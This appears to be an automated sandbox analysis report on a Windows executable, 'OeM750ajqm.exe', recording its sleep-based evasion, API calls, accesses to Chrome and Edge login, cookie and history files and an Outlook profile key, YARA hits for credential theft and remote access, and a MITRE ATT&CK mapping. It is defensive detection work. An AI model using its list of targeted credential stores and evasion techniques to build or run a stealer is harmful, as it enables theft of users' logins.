            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598248s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597779s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597659s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597527s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597298s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595420s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595202s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595092s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594983s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594653s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594540s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00406751 FindFirstFileA,FindClose,3_2_00406751
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405B80
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_004027CF FindFirstFileA,3_2_004027CF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_00406751 FindFirstFileA,FindClose,4_2_00406751
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_004027CF FindFirstFileA,4_2_004027CF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405B80
            Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWf
            Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | API call chain: ExitProcess graph end node graph_3-4881
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | API call chain: ExitProcess graph end node graph_3-5048
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 3_2_6D6C1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 3_2_6D6C1B28
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Process created: C:\Users\user\Desktop\OeM750ajqm.exe "C:\Users\user\Desktop\OeM750ajqm.exe"
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Queries volume information: C:\Users\user\Desktop\OeM750ajqm.exe VolumeInformation
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 3_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 3_2_004034F1
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: OeM750ajqm.exe PID: 4940, type: MEMORYSTR
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\OeM750ajqm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match | File source: 00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: OeM750ajqm.exe PID: 4940, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: OeM750ajqm.exe PID: 4940, type: MEMORYSTR
            MITRE ATT&CK Matrix (one line per tactic; a leading number marks a technique matched for this sample, techniques without a number were not observed)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 2 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: 21 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 3 File and Directory Discovery; 215 System Information Discovery; Remote System Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: 1 Web Service; 21 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.